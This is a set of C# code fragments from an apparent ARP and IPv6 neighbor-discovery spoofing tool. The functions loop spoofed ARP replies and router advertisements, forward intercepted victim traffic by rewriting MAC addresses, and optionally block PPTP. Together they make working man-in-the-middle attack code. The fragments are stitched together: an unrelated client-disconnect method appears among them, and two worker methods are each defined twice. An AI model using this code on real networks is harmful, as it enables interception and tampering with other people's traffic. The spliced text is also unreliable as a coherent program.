// worker function for sending RA packets
public void WorkerSender()
{
while (SpoofingStarted)
{
// we need to generate packets inside the loop, because IPv6toMACTargets can change (86 bytes for ND, 166 for RA ?)
var sendQueue = new SendQueue(IPv6toMACTargets.Count * 86 + 166 + 512);
sendQueue.Add(GenerateRouterAdvertisement(prefix).Bytes);
foreach (var target in IPv6toMACTargets)
{
// send spoofed ND advertisements to the gateway
if (target.Key != gatewayIPv6)
{
sendQueue.Add(GenerateNDAdvertisement(target.Key).Bytes);
}
}
sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
sendQueue.Dispose();
Thread.Sleep(2500);
}
return;
}
/// <summary>
/// A variation to original "Transmit" method accepting "null" queues.
/// </summary>
public static void TransmitAll(this SendQueue sendQueue, WinPcapDevice device)
{
if (sendQueue == null)
{
return;
}
sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
sendQueue.Dispose();
}
/// <summary>
/// Transmits a send queue via internal "WinPcapDevice" and disposes it at the end.
/// </summary>
public void SendPacketQueue(SendQueue packetQueue)
{
if (!PcapDevice.Opened)
{
return;
}
PcapDevice.SendQueue(packetQueue, SendQueueTransmitModes.Normal);
packetQueue.Dispose();
}
// send old ARP information to targets
private void ReArpTargets()
{
// somewhere around 58 bytes for an ARP reply
var sendQueue = new SendQueue(SpoofingTargets1.Count * 2 * 60);
foreach (Target target1 in SpoofingTargets1)
{
sendQueue.Add(GenerateARPReply(target1.IP, SpoofingTarget2.IP, SpoofingTarget2.PMAC, target1.PMAC).Bytes);
sendQueue.Add(GenerateARPReply(SpoofingTarget2.IP, target1.IP, target1.PMAC, SpoofingTarget2.PMAC).Bytes);
}
device.SendQueue(sendQueue, SendQueueTransmitModes.Normal);
sendQueue.Dispose();
return;
}
public virtual void Close(string message)
{
if (Queue != null)
{
Queue.Dispose();
}
SetWorld(World.Void);
Log.WritePlayer(this, "Client Closed: " + message);
if (Phase == Phases.Handshake)
{
SendToClient(new DisconnectHandshake(message));
}
else
{
SendToClient(new Disconnect(message));
}
Phase = Phases.FinalClose;
clientStream.Flush();
clientStream.Close();
}
// worker for sending ARP reply packets
public void WorkerSender()
{
var sendQueue = new SendQueue((SpoofingTargets1.Count * 2 * 60) + 60);
foreach (Target target1 in SpoofingTargets1)
{
// send fake replies to the gateway
sendQueue.Add(GenerateARPReply(target1.IP, SpoofingTarget2.IP, SpoofingTarget2.PMAC).Bytes);
// senda fake replies to targets
sendQueue.Add(GenerateARPReply(SpoofingTarget2.IP, target1.IP, target1.PMAC).Bytes);
}
while (SpoofingStarted)
{
sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
Thread.Sleep(2500);
}
sendQueue.Dispose();
return;
}
// worker function for routing IPv6 packets
public void WorkerRouter()
{
while (SpoofingStarted)
{
// size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying)
int bufferSize = 2048;
// copy packets to threadRoutingQueue
lock (PacketQueueRouting)
{
foreach (Packet packet in PacketQueueRouting)
{
threadQueueRouting.Add(packet);
bufferSize += packet.Bytes.Length;
}
PacketQueueRouting.Clear();
}
if (threadQueueRouting.Count > 0)
{
var sendQueue = new SendQueue(bufferSize);
// loop through packets and change MAC addresses
foreach (Packet packet in threadQueueRouting)
{
if (packet == null)
{
continue;
}
var ethernetPacket = (packet as EthernetPacket);
if (ethernetPacket == null)
{
continue;
}
var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet));
var sourceIP = ip.SourceAddress.ToString();
var destinationIP = ip.DestinationAddress.ToString();
var destinationMAC = ethernetPacket.DestinationHwAddress.ToString();
if (sourceIP == deviceInfo.IPv6 || destinationIP == deviceInfo.IPv6)
{
continue;
}
// skip local network traffic
if ((sourceIP.Contains(prefix.Replace("::", ":")) && destinationIP.Contains(prefix.Replace("::", ":"))) || (sourceIP.Contains("fe80::") || destinationIP.Contains("fe80::")))
{
continue;
}
// check for IPv6 - MAC entry existance (check only addresses from this network) and add it if necessary (we need this because scanner cannot pick up IPv6 addresses of all the targets)
if (sourceIP.Contains(prefix.Replace("::", ":")) && !IPv6toMACTargets.ContainsKey(sourceIP) && !sourceIP.Contains("fe80::"))
{
lock (IPv6toMACTargets)
{
IPv6toMACTargets.Add(sourceIP, ethernetPacket.SourceHwAddress);
}
}
// incoming packets (internet -> nighthawk) - change destination MAC back to target's MAC
if (IPv6toMACTargets.ContainsKey(destinationIP) && (destinationMAC != IPv6toMACTargets[destinationIP].ToString()))
{
ethernetPacket.SourceHwAddress = physicalAddress;
ethernetPacket.DestinationHwAddress = IPv6toMACTargets[destinationIP];
if (ethernetPacket.Bytes != null)
{
sendQueue.Add(packet.Bytes);
}
}
// outgoing packets (targets -> nighthawk) - change destination MAC to gateway's MAC
if (IPv6toMACTargets.ContainsKey(sourceIP) && (destinationMAC != IPv6toMACTargets[gatewayIPv6].ToString()))
{
ethernetPacket.SourceHwAddress = physicalAddress;
ethernetPacket.DestinationHwAddress = IPv6toMACTargets[gatewayIPv6];
if (ethernetPacket.Bytes != null)
{
sendQueue.Add(packet.Bytes);
}
}
}
sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
sendQueue.Dispose();
threadQueueRouting.Clear();
}
else
{
Thread.Sleep(1);
}
}
return;
}
// worker for routing IPv4 packets
public void WorkerRouter()
{
while (SpoofingStarted)
{
// size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying)
int bufferSize = 2048;
// copy packets to thread's packet storage (threadRoutingQueue)
lock (PacketQueueRouting)
{
foreach (Packet packet in PacketQueueRouting)
{
threadQueueRouting.Add(packet);
bufferSize += packet.Bytes.Length;
}
PacketQueueRouting.Clear();
}
if (threadQueueRouting.Count > 0)
{
var sendQueue = new SendQueue(bufferSize);
// loop through packets and change MAC addresses
foreach (Packet packet in threadQueueRouting)
{
if (packet == null)
{
continue;
}
var ethernetPacket = (packet as EthernetPacket);
if (ethernetPacket == null)
{
continue;
}
var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet));
// discard invalid packets
if (ip is IPv4Packet && (((IPv4Packet)ip).Checksum == 0 || !((IPv4Packet)ip).ValidIPChecksum))
{
continue;
}
var sourceIP = ip.SourceAddress.ToString();
var destinationIP = ip.DestinationAddress.ToString();
var sourceMAC = ethernetPacket.SourceHwAddress.ToString();
var destinationMAC = ethernetPacket.DestinationHwAddress.ToString();
if (destinationMAC == sourceMAC)
{
continue;
}
// block PPTP if necessary (exclude local computer)
if (blockPPTP && sourceIP != deviceInfo.IP && destinationIP != deviceInfo.IP)
{
// block GRE
if (ip.Protocol == IPProtocolType.GRE)
{
continue;
}
// check for port 1723 and block it
if (ip.Protocol == IPProtocolType.TCP)
{
var tcp = TcpPacket.GetEncapsulated(packet);
if (tcp != null && (tcp.SourcePort == 1723 || tcp.DestinationPort == 1723))
{
continue;
}
}
}
// incoming packets - change destination MAC back to target's MAC
if (IPtoMACTargets1.ContainsKey(destinationIP) && (destinationMAC != IPtoMACTargets1[destinationIP].ToString()))
{
ethernetPacket.SourceHwAddress = physicalAddress;
ethernetPacket.DestinationHwAddress = IPtoMACTargets1[destinationIP];
if (ethernetPacket.Bytes != null)
{
sendQueue.Add(packet.Bytes);
}
}
// outgoing packets - change destination MAC to gateway's MAC
if (IPtoMACTargets1.ContainsKey(sourceIP) && (destinationMAC != SpoofingTarget2.PMAC.ToString()))
{
ethernetPacket.SourceHwAddress = physicalAddress;
ethernetPacket.DestinationHwAddress = SpoofingTarget2.PMAC;
if (ethernetPacket.Bytes != null)
{
sendQueue.Add(packet.Bytes);
}
}
}
sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
sendQueue.Dispose();
threadQueueRouting.Clear();
}
else
{
Thread.Sleep(1);
}
}
return;
}
